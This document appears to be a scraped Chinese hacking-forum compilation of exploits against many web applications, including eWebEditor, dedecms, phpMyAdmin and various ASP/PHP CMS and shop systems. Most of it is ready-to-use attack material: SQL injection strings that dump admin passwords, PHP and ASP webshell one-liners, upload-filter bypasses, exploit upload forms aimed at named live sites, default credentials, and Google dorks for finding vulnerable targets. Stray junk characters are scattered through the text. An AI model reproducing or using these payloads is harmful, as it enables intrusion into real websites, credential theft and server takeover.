启航企业建站系统 cookie注入漏洞通杀所有版本' K- C* i8 d) p; {6 X ?# c3 t
7 f4 `, k) S8 t; a a' r% l直接上exploit:( T3 y7 }3 S0 X- K
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));1 ^% u7 Y# S d! q7 L
test:http://www.tb11.net/system/xitong/shownews.asp?id=210
' ]- Q# X- v# I$ J, Q' v6 i1 ^--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; A0 c" ~5 y' n+ V9 _3 W: x a$ tAsprain论坛 注册用户 上传图片就可拿到webshell
; k$ B" ]3 Z0 b" [' f% Y2 x
, @; ]+ Q8 |2 ]& }/ SAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。5 Z/ I: O( V- N& u9 b# }
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
) Y3 U8 l) M% R: R& f2.gif 为一小图片文件,一定要小,比如qq表情图片
) {1 R# |, ^2 o& T- `! o3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
4 Z; g H2 e0 ~% p- W4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了# Z% r9 [3 F8 U c
5.q.asp;.gif
8 y7 \7 V1 c! K, q. Ugoogle:Powered by Asprain; {5 K7 n& {7 h8 o9 U
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 y/ W7 F* g& J. S2 Z9 c0 p/ c
3 J* Z P8 W" C& P6 A9 B$ g+ uShopNum1全部系统存在上传漏洞。0 d, O# U! a$ X8 p$ B: Z) V
8 k& T4 a f* O首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
9 ?7 N. @0 H I( B按说明 提示登录后台。。. V3 | M$ L7 x2 ~2 l
在后台功能页面->附件管理->附件列表) {" T( ^" K [* ~
可以直接上传.aspx 后缀木马: H6 S. m7 M; y4 r
http://demo.shopnum1.com/upload/20110720083822500.aspx
" e) K( S3 d7 A7 D; }1 M--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 |- \1 E3 f* C( D2 P% m2 E' Z$ G, h6 r1 ^/ k# Q/ g
牛牛CMS中小企业网站管理系统 上传漏洞6 u* x0 g9 [7 D# G
" ~7 W+ B# K, M" e' w v
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
$ e* i; a% I* T. y0 B6 N后台:admin/login.asp$ U' J- `( j* ?7 V+ ]
ewebeditor 5.5 Nday
# u3 @$ B) O0 g* _exp:7 T1 p. n& b! e [3 f/ G
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?5 [- p8 W5 E' W+ t K1 h5 g6 `
<input?type=file?name=uploadfile?size=100><br><br>?
" _* E. B8 t3 B<input?type=submit?value=upload>?
% l' U) c$ {; S# l: L' u3 `( l</form>
+ o4 N& w. a3 y. P& zps:先上传小马.
0 N# h, j6 i1 B/ m- M; E; Sinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
; o: ?( q: B+ p4 h
. [& r* A: z H' q) j3 Z--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 Y d- z6 t5 V+ ]' E1 [! o1 h8 u$ ]) Y8 T z
YothCMS 遍历目录漏洞 _% r8 { o/ T: Z3 B2 [
3 y: E' z4 `( V! {( ?3 P H) U
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。; @& K4 b T! B0 S! l# }
默认后台:admin/login.asp
9 K* d: ?, }! a; {! L: T遍历目录:9 t3 e4 [# k& k6 P$ l
ewebeditor/manage/upload.asp?id=1&dir=../ t* @' d8 O& f7 [+ \% u9 y
data:
! L. p; [/ s. \' c+ Ohttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa1 x0 |% S' l5 I" D& B
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. G4 S, A( N: J
7 C" x: c8 x' D% K1 A2 dNet112企业建站系统 1.0
) U0 Z/ y, `$ o
- S$ B- Y- ^, F2 l- S源码简介:% W8 n5 L. F; h. w. e
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。8 j7 n9 o" f( @( |1 B3 l/ p! S
添加管理员:# c, y: D" A. \; S" i" Q3 T
http://www.0855.tv/admin/admin.asp?action=add&level=2# W3 A: o) M Q2 e8 d
其实加不加都不是很重要,后台文件都没怎么作验证。
3 s3 _8 O( G2 a9 Z8 Z上传路径:
: V- A1 p% |+ |1 b3 Thttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
6 J0 G- C2 d) L4 j' H) Zhttp://www.0855.tv/inc/Upfile.asp?Stype=2
5 b' R% P. X# Y6 {0 B- _* b怎么利用自己研究。 \* h- Z( B- D0 R1 U
遍历目录:' V/ }$ @. a$ k$ n+ y* \
http://www.0855.tv/admin/upfile.asp?path=../.., ]7 @4 K7 i* P$ L
如:
. l/ a& k$ u/ y: P! u4 n/ ]5 \7 shttp://www.0855.tv/admin/upfile.asp?path=../admin/ k+ a0 ^: w% T
http://www.0855.tv/admin/upfile.asp?path=../data
* x4 s/ P+ G$ w0 N, A% F--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( k8 i! W: j6 j/ l% |+ c! _3 S0 `2 z/ l1 `6 ?/ `
易和阳光购物商城通杀 上传漏洞
) O, l6 _" @( j5 p; M
& T& H ]1 ?, j G, @( U1 O. h前提要求是IIS6.0+asp坏境。$ v( x0 K9 Y9 F$ m2 c/ }3 R
漏洞文件Iheeo_upfile.asp
$ Z( }! n5 B4 `1 J K* W8 S, R过滤不严.直接可以iis6.0上传- z; z0 ~/ a* N# `9 F! x# @
把ASP木马改成0855.asp;1.gif1 Y: m0 o6 V' V J* V- T& B
直接放到明小子上传' j- ?' ^% i9 V# G9 P
Google搜索:inurl:product.asp?Iheeoid=
, \# d8 S3 J3 f' A4 Z--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 G5 b- c( [: T4 f# G
8 g8 y" U$ H' v8 O; }0 J5 F/ wphpmyadmin后台4种拿shell方法% p! l5 M$ ]5 A2 B! b/ `' I# n
p5 c4 n2 v5 e/ ?- r/ _4 }
方法一:% P I% j9 j: R' _8 D
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
9 b7 ?0 J9 E) G3 b w0 c$ CINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
' p& q. v8 J9 D2 T9 H0 G; vSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';6 t7 W3 C! x: o1 @
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php( I+ M8 a0 q3 z. S; j4 l
一句话连接密码:xiaoma
/ A! K# }: U+ m! j$ o& d- O8 Z方法二:$ ^- g7 W8 u( u6 O' N5 x: `3 }
Create TABLE xiaoma (xiaoma1 text NOT NULL);. {+ h1 y' l- D" M6 g5 C6 ?
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');! Q- T3 f: l% i
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';! ]& @' l- j8 V+ V- P2 K
Drop TABLE IF EXISTS xiaoma;" S/ a% B$ b2 n: c6 W# c: h
方法三:& K3 x6 m; y# T/ u( A- {
读取文件内容: select load_file('E:/xamp/www/s.php');
I& \& ^+ }/ E1 {. b/ t; R写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php') i: f* V7 X' m, s' z+ }! W e
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'2 W8 y8 V/ t2 D/ ~
方法四:5 }, m+ _ S, Y- b' A
select load_file('E:/xamp/www/xiaoma.php');
& H/ ~! h9 D/ Eselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
( z" Y" l; u' O然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir0 ]! [$ p! b) B6 ]; F" C0 ]7 r
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 A$ L( c4 S* L+ D& E8 E# u
( G; B7 { z+ U: P. a传信网络独立开发网站源码0day漏洞! M0 O4 j/ Q3 ]8 n2 w
) H; w* q4 {' M7 ~: ?! O/ I后台system/login.asp
* J$ T0 u$ w, V# d* q1 u% c进了后台有个ewebeditor
- E# y N2 B+ @2 a' E# B, Q- {$ m# WGoogle 搜索inurl:product1.asp?tyc=
1 g; H. U- [' ]! R p5 E$ k编辑器漏洞默认后台ubbcode/admin_login.asp
; V6 U9 e; @+ Y# E- U q/ d数据库ubbcode/db/ewebeditor.mdb
. h/ l3 j: W( _; F1 ^! {. j3 s0 G默认账号密码yzm 111111; a* Z& G8 t$ R) `# c9 x: z7 a
. T+ M% b' @8 N! I `. j- {5 b. d4 ~6 U
拿webshell方法
9 r$ @* j2 g4 {2 \; l5 C8 o0 }登陆后台点击“样式管理”-选择新增样式
F9 B5 w; i: `, I样式名称:scriptkiddies 随便写 ! u. _/ B8 k8 n" ?7 C& i' { O
路径模式:选择绝对路径
: B/ {3 Q) w- j3 o- D' y图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx/ ~9 h0 A# e. ]. f4 a9 r5 S* k
图片类型比如就是我们要上传的ASP木马格式
3 S6 j/ d8 l2 y: I上传路径:/9 X' t, B. D2 F: t/ y! i
图片限制:写上1000 免的上不了我们的asp木马 X0 v z8 ]+ ^- g* O) T5 P
上传内容不要写
: f& Q& X4 e- k# `5 r6 b可以提交了
, B( N( p f, h样式增加成功! $ v! P$ e0 q5 X4 |
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
0 {3 w% K9 ~1 G) l按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置) w" r( H n! v( [6 R. g7 J
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies* O$ T: f1 J( X' x
上ASP木马 回车 等到路径) S* t0 S9 H; j/ P" D" G
' R1 j/ ?: ]2 D7 m( I+ J5 R后台:system/login.asp
6 c" g; }) n' j7 X3 }, N3 kExp:
) s( }: U. x4 E1 s% |& W3 uand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master$ X4 U9 A, o% x7 f) n p8 h2 x
测试:
& b: }) ^0 W, jhttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
; q; H8 r. @% ?2 m$ m7 Zhttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
( q- {% S+ p: _: j--------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 _/ ?+ c! D8 q# j" g
" I; L. P W. T& x# y. T) k
foosun 0day 最新注入漏洞
" M& H! x( M# {# s& X3 w- V! Z
+ q+ C4 e8 ?5 V. _0 W# J" ~漏洞文件:www.xxx.com/user/SetNextOptions.asp# y% |8 v- O1 J1 q( g
利用简单的方法:$ G! b: j- D( z+ o/ ~- ~
暴管理员帐号:- H2 e) w+ b+ q. u4 b: g( r6 s
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin0 @) E6 z/ k8 N+ k( @- O7 k8 D
暴管理员密码:* T& e P9 a$ M" p* V
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
+ S& O- @+ b7 {- R1 ?( Y* s2 r+ ?5 g--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, T; ?* _6 {8 j" G
5 V G1 O* a: R6 o网站程序的版权未知!' F) ]3 S. b, p# \( e
5 _1 ~) g2 E% O) x- A
默认网站数据库:
2 Y" _: ~9 {! ?4 Uwww.i0day.com/data/nxnews.mdb5 g k4 m* n3 y2 G
ewebeditor 在线编辑器:
! i2 M" f e: `3 u W' T* z编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
4 y$ p, b4 J. v& j6 ^登录地址:ewebeditor/admin_login.asp8 u( Q) U0 R6 q7 r
默认密码:admin admin: c0 K( K! J5 W
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data0 b; o. _3 P7 }( e ~+ b! ~# i2 r, x7 w% w
9 r% d1 L; O8 V, K3 T) a7 j
Sql注入漏洞:3 I. e# t& x- N7 t
http://www.i0day.com/detail.asp?id=12
2 s0 f, f( I" l7 T* e: v* hexp:% M) N* _& A$ \4 f- O6 C/ W
union select 1,admin,password,4,5,6,7,8 from admin
! x: s- P$ J: @6 y/ X$ k爆出明文帐号/密码$ {. F9 b# [9 I; T4 t
" _1 q* U3 l2 T }
上传漏洞:
# m" f7 R- l9 W- E1 N3 q$ l后台+upfile.asp% g% a" E' F" h) w
如:
* H3 I6 C; z0 q- V0 Rhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
* C9 Y( W& v; d0 g. }shell的地址:网址+后台+成功上传的马% ^/ o! d6 g& C/ V% n* L! \3 R! S
google:inurl:news.asp?lanmuName=
8 x8 X( o" [& Q------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 s! F: G& I8 }7 q2 \3 U: r( j6 ? c9 K- O! N
dedecms最新0day利用不进后台直接拿WEBSHELL
k3 _7 a( u/ B6 f. s' l" b: ^0 |, y% v( Z8 e. c+ k% y
拿webshell的方法如下:
! R: B2 U" E) f网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
; {& h$ u/ C) b/ u. N( s0 e前题条件,必须准备好自己的dede数据库,然后插入数据:4 z4 o" F# g6 J9 x3 m6 L; ^1 ?
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); 8 p+ k' A ]( H( z0 ^
0 j+ D% {) m& S/ ?. w8 }再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
3 V7 `) Q/ I4 f* V7 X<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">1 g T1 [* s6 Q6 z l5 I0 F
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />) ~( b+ L4 i; C2 |6 }1 }, B
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
+ V) u3 w2 y9 t: |1 d$ L( t+ F<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
* b+ J4 X Y# j- R2 E* L<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />8 ~6 y- A4 U% m
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />) k3 l5 Q$ I9 u0 C6 ^
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
6 ~5 G( i R3 j: ?3 R: ~7 h<input type="text" value="true" name="nocache" style="width:400">8 ]* C, l( e5 o+ o: y/ j% G" e
<input type="submit" value="提交" name="QuickSearchBtn"><br />. ]7 s0 u8 w( z: }8 q
</form>9 V+ D& @+ Z. t3 K+ W! m( L
<script>% k* t. r6 ]" Y8 g+ ^; {( q* d
function addaction()
3 d8 D7 n# q; A0 Q& w{
6 N/ k2 j( U# d/ s# xdocument.QuickSearch.action=document.QuickSearch.doaction.value;
1 M) l# B0 { A& J* n/ k}
0 W: N- w/ K- O+ b8 m8 S3 X9 O. A: U</script>
4 o& q4 C+ P0 o9 Z% q1 c) r3 ]-----------------------------------------------------------------------------------------------------------------------------------------------, o7 H) \( X" h" d' G
, p$ _( T8 {& [& W( a# Z
dedecms织梦暴最新严重0day漏洞
* H! t7 Y9 G9 {# \6 {bug被利用步骤如下:
6 R" E7 [7 J. Whttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
+ y5 D; m+ ^/ E# c8 y# r g7 I- B把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
3 Z4 U7 r7 S+ {, ]) D-------------------------------------------------------------------------------------------------------------------------------------------+ h- c2 R$ b% ]( {9 y- _
9 D4 Y7 P5 O$ D; c多多淘宝客程序上传漏洞
. ]3 q1 U8 q& g漏洞页面:7 q! O+ ^0 [! q/ R
admin\upload_pic.php+ q: {6 A) N) v Q; V, v
传送门:$ O. b" d E! z& V
http://www.www.com/admin/upload_pic.php?uploadtext=slide11 b8 l9 @! A) z5 N
PS:copy张图片马 直接 xxx.php 上传抓包地址!+ Z8 W& O! q; @! V. h+ k9 E% c
------------------------------------------------------------------------------------------------------------------------------------------------------9 V9 D, }5 O, |6 O ?
6 U6 O9 _2 |1 k! R无忧公司系统ASP专业版后台上传漏洞* K6 ~6 f- G; v1 A8 A. L
漏洞文件 后台上传: U* g5 W9 m0 Y5 R
admin/uploadPic.asp9 e! c7 m8 u0 _4 L) d. T+ r* p# l
漏洞利用 这个漏洞好像是雷池的
7 P9 y- a5 d c" khttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1" r$ {# n+ |# m5 `7 C
等到的webshell路径:
# a F1 c" @9 `5 k, l$ h# E; J/UploadFiles/scriptkiddies.asp;_2.gif0 ^% N# ?+ I2 F1 Y2 c1 o
---------------------------------------------------------------------------------------------------------------------------------------------------
% B9 Y8 g' ]; Q8 }9 I0 _ |! j
% s0 S. V. D7 o4 @5 l/ \& c住哪酒店分销联盟系统20101 u+ C: w C5 g6 i. M- V* v
Search:, G; U% L% D% |0 \; N) t
inurl:index.php?m=hotelinfo
/ {9 [, J& }5 t4 k f. {4 R5 Ghttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
4 Q/ S5 N/ O& j) {默认后台:index.php?m=admin/login
* J! c+ v! o* [/ m: n" Z--------------------------------------------------------------------------------------------------------------------------------------------------9 d5 T- t, G" X$ o, r. t$ v
- p" f: R. f( \1 V4 U6 _inurl:info_Print.asp?ArticleID=
5 D. J, t: P2 p& Z# U4 z* i6 r$ N后台 ad_login.asp# Y% u( _* C' |$ E2 M
爆管理员密码:
E( ?0 V6 A3 |; J/ runion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin. B1 i- }, ?1 j, V' a) b; F
------------------------------------------------------------------------------------------------------------------------------------------------------------' u% m/ w2 c2 s
, n' W0 f Z1 A. [* v
搜索框漏洞!' I0 _) Q# F% d6 c
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
2 p8 c) N' u4 H9 b( W--------------------------------------------------------------------------------------------------------------------------------------------------------
) d# E. s9 Z' F( U, o
& W% a- L! ~! n- R: i! J关键字:' x! Z0 y, K0 A$ M7 e
inurl:/reg_TemletSel.asp?step=2
; M6 E8 F0 W4 E1 Z- N" V% L或者
: f- Z5 ] z @! ^+ G, _% j9 n. ^电子商务自助建站--您理想的助手 m8 {9 ~: S, i
-------------------------------------------------------------------------------------------------------------------------------------------------# L2 M. ~3 `* A! o) Q
; x* C% k5 G. a+ D7 viGiveTest 2.1.0注入漏洞
4 n) Q* d2 H: DVersion: <= 2.1.0$ ~- d- x8 _+ t
# Homepage: http://iGiveTest.com/! }! v2 V4 Y! E0 `" i& A' ~
谷歌关键字: “Powered by iGiveTest”/ A1 `( i) B5 W3 P7 Z6 `/ e
随便注册一个帐号。然后暴管理员帐号和密码
* h! N. I+ E: D3 ~# w6 K- Ahttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1" O. L d+ {1 l8 H
------------------------------------------------------------------------------------------------------------------------------------------------
7 u8 d! V) r# {2 P. M$ f) L' J) r4 `; b$ i4 u7 k2 A0 h
CKXP网上书店注入漏洞" N5 n& C6 B- z' i
工具加表:shop_admin 加字段:admin" l) r0 E& F/ d+ K# u* h5 p
后台:admin/login.asp
* ^$ l2 m- R0 H& O- U4 q$ A" y1 o登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=// I; v, ~* ?; @. Y' _
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息* {; C1 N3 v Q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 G# x1 I' N- e G0 X* b9 C/ v
. x$ W% i8 n+ N* M
段富超个人网站系统留言本写马漏洞
) P: V3 x3 ~) d. l, `4 m1 K ?( Z源码下载:http://www.mycodes.net/24/2149.htm
$ C1 B. v/ m1 _1 w% M7 Baddgbook.asp 提交一句话。
& I0 X2 C6 ?: u7 a0 e. j' b连接: http://www.xxxx.tv/date/date3f.asp; t" p8 L( y; u/ n
google:为防批量,特略!2 O7 o9 S! }+ q! I6 N
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 H" i+ |$ O: ]# M7 k* C9 l
& x% R7 k- [! ` [6 L
智有道专业旅游系统v1.0 注入及列目录漏洞- z+ [2 m, r. M- s# d, y
默认后台路径:/admin/login.asp
5 G t, p! n% [6 z默认管理员:admin
) q5 k2 U# l3 h6 F默认密码:123456. g1 `% r; s/ S& r
SQL EXP Tset:
; w B+ |" c* _* A9 ~, h( v3 Shttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
7 D+ m' }5 ?" B X, w- z------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% M% I8 B6 i1 a2 ` k2 P& b. k; Y P. q6 \) I' s
ewebeditor(PHP) Ver 3.8 本任意文件上传0day3 Z+ ]5 P; g( w- p- C8 E+ x) q6 I' K
EXP:9 n# D8 }8 ~" _! ^$ s
<title>eWebeditoR3.8 for php任意文件上EXP</title>0 i$ B/ Z$ r* s
<form action="" method=post enctype="multip
4 ]& u8 ` R0 `art/form-data">
9 v4 c' A4 A( O5 y3 b/ A<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> * i- q% E v/ q4 i3 B
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> 1 _3 t; b6 k7 g5 S' z8 F o4 _
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> 4 l) {& D% ?$ E$ L' B3 B
file:<input type=file name="uploadfile"><br>
8 n8 m+ O7 F+ H: O3 W<input type=button value=submit onclick=fsubmit()>
: N% m, N* J5 ]! i0 y# [: B</form><br> $ A- l/ v4 Q! j' z8 h
<script>
# H) l; i8 L$ X+ U; I- {function fsubmit(){ 9 a( G/ t% j( }0 L$ k& \
form = document.forms[0]; ( J/ q7 g0 l* G, U0 _8 b
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; 9 i% \" Y* S) Y, Q
alert(form.action);
Q7 y1 W; u1 M7 l# r* @/ aform.submit(); ' ?; h+ J' ]& H) t$ T
} , {" g3 z% I, V
</script>& y' Q5 M! s. a/ {: Y$ J4 l
注意修改里面ewebeditor的名称还有路径。( }& z; p+ M. D$ S" u
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- V. ?+ |6 n1 u9 @# \+ U
: N6 s" W0 k0 A, z2 ]0 G) a" ~1 i# X' E
提交’时提示ip被记录 防注入系统的利用# {% e8 q; f& T# i, G
网址:http://www.xxx.com/newslist.asp?id=122′
* T0 g2 @7 A: \; y. o) k0 h提示“你的操作已被记录!”等信息。% Q. q) o' N5 `- R! `$ x
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
; A* S; g, C2 |! d-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& X# j2 X/ r. ~; {$ W
& _9 d0 C/ ^( J% ~4 W. G; A西部商务网站管理系统 批量拿shell-0day# V O. j, k) k2 h' j) q0 w
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
4 L4 d4 o* a) H7 p5 f. [1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
' U% g7 }, y0 M g* O2 I9 H- ~& X) d. i3 `2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合, c* c% B6 C9 L
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
) A, ^! f, k" e1 G6 u6 S---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- E" f$ o& n* a$ X- ^% |& @0 P0 w* X& G; [8 s
JspRun!6.0 论坛管理后台注入漏洞
5 ~3 n* E8 ?/ C1 t& E( M" y B; A1 H* @. ]
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:% y/ \/ M& Y2 F7 b2 s
JspRun!6.0 1 X/ F {) E& e' F/ A
漏洞描述:; d9 f: s, l- n+ i4 z0 e# H, t8 J
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
# X0 G6 u. b, q" p. ^7 E0 m在处理后台提交的文件中ForumManageAction.java第1940行
2 l$ |, @9 X& X8 F4 D; FString export = request.getParameter("export");//直接获取,没有安全过滤 y7 C) t a& l- u5 K
if(export!=null){
5 K" A. ? f9 {0 c! K* SList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...7 {& M+ |* @$ k
if(styles==null||styles.size()==0){1 z. O6 y {3 [) ~# @
<*参考
. r/ U: Q3 r' O6 m/ Hnuanfan@gmail.com
! W; d- P" C: G( `0 I. j*> SEBUG安全建议:
) \7 {$ N6 x! Z" C+ }6 Qwww.jsprun.net
1 `8 g5 c; H7 s% T" y/ W(1)安全过滤变量export+ x6 U% w. X+ t
(2)在查询语句中使用占位符
0 k4 _9 x9 M7 l' \7 j7 `# n$ ~$ a------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! w: q* \+ p4 b5 |$ W f' F# ^0 f% ]
乌邦图企业网站系统 cookies 注入' p5 D$ b$ o* u( t1 Q3 m: Y
( r" e# @! @5 T' E
程序完整登陆后台:/admin/login.asp
9 x% }' X% ^0 G' s o默认登陆帐号:admin 密码:admin888
( `* B9 Z: D& |( Z8 x* \语句:(前面加个空格)
) W" B {3 k, vand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
) O& R4 o8 F! [或者是16个字段:
( z5 M% L+ K$ b; Gand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin8 A! ] j. i' q. S3 R, Q$ L9 P
爆不出来自己猜字段。
+ l% f0 w- h/ j& B- J注入点:http://www.untnt.com/shownews.asp?=88
' q9 L1 J0 g4 x: Cgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp3 Y: t; @* T- L4 R ]' S2 Z6 R
关键字:
3 j5 n" n5 A8 C( G+ l. D$ ]* B5 [inurl:shownews?asp.id=2 K# Z p6 Z9 i
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 S/ S% V6 I4 |) P6 O9 u7 P' \0 ?
$ c g% p* O% sCKXP网上书店注入漏洞
6 S' i8 V+ ^8 h/ X) `; q; U3 }+ U! @0 q) c9 Y0 Y9 {6 g8 j
工具加表:shop_admin 加字段:admin
* A5 c: d2 \2 R: Q7 f& U后台:admin/login.asp
& D. u) \% b( O' Y2 }( R9 \& f* u登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
/ ~+ v& ]* U+ X/ einurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
, \+ z# C+ f% R; @' i/ Y) ~---------------------------------------------------------------------------------------------------------------------------------------------------------------------------, l* }9 @4 |0 f: w
b0 x' \4 ^- EYxShop易想购物商城4.7.1版本任意文件上传漏洞6 `( p* l. C. P$ j4 e* p5 O
( y1 I8 e5 D0 c( ?0 ], G
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
9 h2 ]" l/ m. {/ G, X+ O0 R跳转到网站根目录上传任意文件。
